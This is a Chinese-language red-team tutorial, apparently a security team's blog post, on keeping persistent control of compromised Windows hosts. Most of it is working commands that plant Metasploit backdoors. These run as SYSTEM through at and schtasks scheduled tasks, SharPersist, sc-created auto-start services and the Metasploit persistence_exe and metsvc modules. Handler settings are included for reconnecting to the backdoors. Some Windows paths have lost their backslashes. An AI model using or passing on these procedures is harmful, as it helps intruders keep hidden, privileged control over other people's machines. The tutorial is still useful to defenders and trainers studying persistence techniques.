红队从0到1实战篇--- 权限维持(二）

以下文章来自夜组的shadow师傅，主要内容为权限维持，希望大家能够从中有所收获。

NightCrawler安全团队诚邀各位共同学习，共同进步。

4.  Windows 计划任务后门

计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而使我们获得目标系统的控制 权。计划任务的持久化技术可以手动实现，也可以自动实现。有效负载可以从磁盘或远程位置执行，它们可以是可执行文件、powershell脚本或scriptlet的形式。

1.  利用 at 命令

at 命令是Windows自带的用于创建计划任务的命令，但是他主要工作在Windows Server 2008之前版本 的操作系统中。我们可以通过at命令通过跳板机在目标主机DC上创建计划任务，让计算机在指定的时间 执行木马程序，从而获得对内网目标主机的控制。  

（1）首先在目标主机上传metasploit生成的后门程序：

（2）然后进入目标主机的shell使用net time命令确定目标主机的当前时间： 

 net time

（3）接着在目标主机的shell中使用at命令创建计划任务，让目标主机在指定的时间运行metasploit木马 程序：如上图所示，计划任务创建成功，目标主机将在每个工作日的15:01:00执行后门程序，我们便可以在这 个时间获得目标机器的控制权： 

at 15:01:00 /every:M,T,W,Th,F c:windowssystem32backdoor.exe

如上图所示，计划任务创建成功，目标主机将在每个工作日的15:01:00执行后门程序，我们便可以在这 个时间获得目标机器的控制权：

2. 利用 schtasks 命令

上面我们讲了用at命令创建计划任务，但是该命令已经被Windows Vista、Windows Server 2008及之 后版本的操作系统废弃了，代替他的是schtasks命命令。schtasks命令比at命令更为灵活、自由。下面 来演示schtasks命令的使用，于是，攻击者开始使用schtasks命令来代替at命令。 利用schtasks创建后门的大致流程如下：

（1）首先在目标主机上传metasploit生成的后门程序。 

（2）然后在目标主机上创建一个名称为“backdoor”的计划任务。该计划任务每分钟启     动一次，启动程序 为我们之前到C盘下的backdoor.exe，启动权限为system。

命令如下：

schtasks /create /tn backdoor /sc minute /mo 1 /tr c:windowssystem32backdoor.exe /ru system /f

然后新开一个metasploit监听，等待一分钟后这个监听便收到了目标主机的session：

并且这个session还是system权限的。

3. 利用SharPersist工具 

下载地址：

https://github.com/fireeye/SharPersist/releases https://github.com/fireeye/SharPersist

SharPersist的创建是为了帮助使用多种不同的技术在Windows操作系统上建立持久性。它是一个国外安全人员用C#编写的命令行工具，可以反射性的加载Cobalt Strike的“execute-assembly”命令或任何其他 支持反射性加载.NET程序集的框架。SharPersist采用模块化设计，以便将来添加新的持久性技术。还有 一些与tradecraft相关的项已经内置到该工具及其支持的持久性技术中，例如file time stomping策略和最小化或隐藏运行应用程序。该工具支持的持久性技术有：

keepass-keepass配置文件后门 

reg-注册表项添加/修改 

schtaskbackdoor-通过向后门计划任务添加其他操作来完成该任务

startupfolder-启动文件夹中的lnk文件

tortoisesvn-乌龟svn钩子脚本

service-创建新的Windows服务

schtask-创建新的计划任务

如果用户具有管理员级别的特权，则可以通过SharPersist工具创建一个新的计划任务，该任务将在 Windows登录期间执行我们上传好的有效载荷。

（1）在目标主机上传我们新生成的metasploit木马和SharPersist程序：

（2）然后使用以下命令创建我们恶意的计划任务：

 SharPersist.exe -t schtask -c "C:WindowsSystem32cmd.exe" -a "/c C:UsersAdministratorbackdoor2.exe" -n "backdoor2" -m add -o logon

然后新开一个metasploit监听，等待目标主机重启后便可以收到目标主机的session，并且还是system 权限的

5.Windows 服务后门 

在Windows主机上，获得了管理员的权限后，我们可以通过创建服务并将服务设置自启动的方式，来对目标主机进行持久控制。

如果未正确配置Windows环境中的服务或这些服务可以用作持久性方法，则这些服务可能导致权限提升。创建 一个新的服务需要管理员级别的特权，它已经不是隐蔽的持久性技术。

利用sc命令手动创建

（1）首先在目标主机上传新生成的msf木马： 

如果帐户具有本地管理员特权，则可直接利用sc命令从目标主机的命令行中创建服务。

sc create backdoor binpath= "C:UsersAdministratorbackdoor.exe" start= auto // 创建服务后门 
binpath：用于执行任意有效负载 
auto：用于确保恶意服务将自动启动。

注意，所有选项的每个=号之前 一定不要有空格 =号后面一定要有空格，否则会错误。

如上图，服务创建成功，然后我们可以在攻击机上重新开启一个metasploit监听，等目标机重启时，目标机就会上线，如下图所示，成功得到了目标机的meterpreter，并且还是system权限的 

也可以执行“sc start backdoor”命令立即启动该服务。

注意：我们在上图新开启的metasploit监听中，使用“set AutoRunScript migrate -f”设置了自动迁 移进程，这是因为当一个进程在Windows系统中启动后，必须与服务控制管理器进行通信，如果没有进行通 信，服务控制管理器会认为出现了错误，进而终止这个进程，所以如果我们不设置自动迁移进程，这个 meterpreter会很快就断掉了。

利用SharPersist工具创建 

下载地址：

https://github.com/fireeye/SharPersist/releases https://github.com/fireeye/SharPersist

除了利用上面的sc命令，我们还可以利用SharPersist工具。SharPersist支持在受感染系统中创建新服务 的持久性技术，在系统上安装新服务需要本地管理员。 

（1） 在目标主机上传新生成的metasploit木马程序backdoor2.exe和SharPersist.exe程序： 

（2）使用以下命令添加新服务，该服务将在Windows启动期间执行任意的有效负载：

SharPersist.exe -t service -c "C:WindowsSystem32cmd.exe" -a "/c C:UsersAdministratorbackdoor2.exe" -n "backdoor2" -m add

如上图，服务创建成功，我们在攻击机上新开启一个metasploit监听，当目标主机重启时，目标主机便 能上线，如下图所示成功得到了目标机的meterpreter，并且还是system权限的 

注意：不要忘记迁移进程。

Metasploit下的利用 Metasploit框架还具有一个后渗透模块，

post/windows/manage/persistence_exe

该模块需要以下 配置，并将可执行文件放置在目标主机的可写位置： 

如上图所示，该模块支持的持久性技术有： 

1. 注册表运行键后门（USER，即我们前文提到的“run persistence”命令就是用的这个技术）

 2. Windows服务后门（SERVICE） 使用该模块创建服务后门时，需要将启动变量修改为SERVICE，以便在系统上安装新服务。

以下是创建服务的设置： 

 use post/windows/manage/persistence_exe set REXEPATH /root/backdoor.exe // 攻击机本地要上传到目标机的paylaod路径 
set SESSION 1 
set STARTUP SERVICE 
set LOCALEXEPATH C:\Users\Administrator // payload上传到目标机后存放的路径
run

如上图，服务后门创建成功，之后的使用方式与前面相同。除此之外，在metasploit上，我们还可以用metsvc模块创建服务，建立持久后门。metsvc后渗透攻击模 块其实就是将Meterpreter以系统服务的形式安装到目标主机，它会上传三个文件：

metsvc.dll 
metsvc-service.exe 
metsvc.exe

并通过服务启动，服务名为meterpreter。 

常用命令： 

run metsvc –h # 查看帮助 
run metsvc –A #自动安装后门

我们使用“run metsvc –A”自动安装后门： 

如上图，服务后门安装成功。接着我们启用另一个终端并进入msfconsole，使用如下命令即可连接后门：

use exploit/multi/handler set payload windows/metsvc_bind_tcp set RHOST 192.168.52.1 //目标机ip set LPORT 31337 //如上图，后门安装过程信息中有 exploit //获取到的会话是system权限

最终解释权由NightCrawler安全团队所有。

扫描下方二维码，联系运营组加入NightCrawler安全团队交流群！

有趣的灵魂在等你

长按二维码识别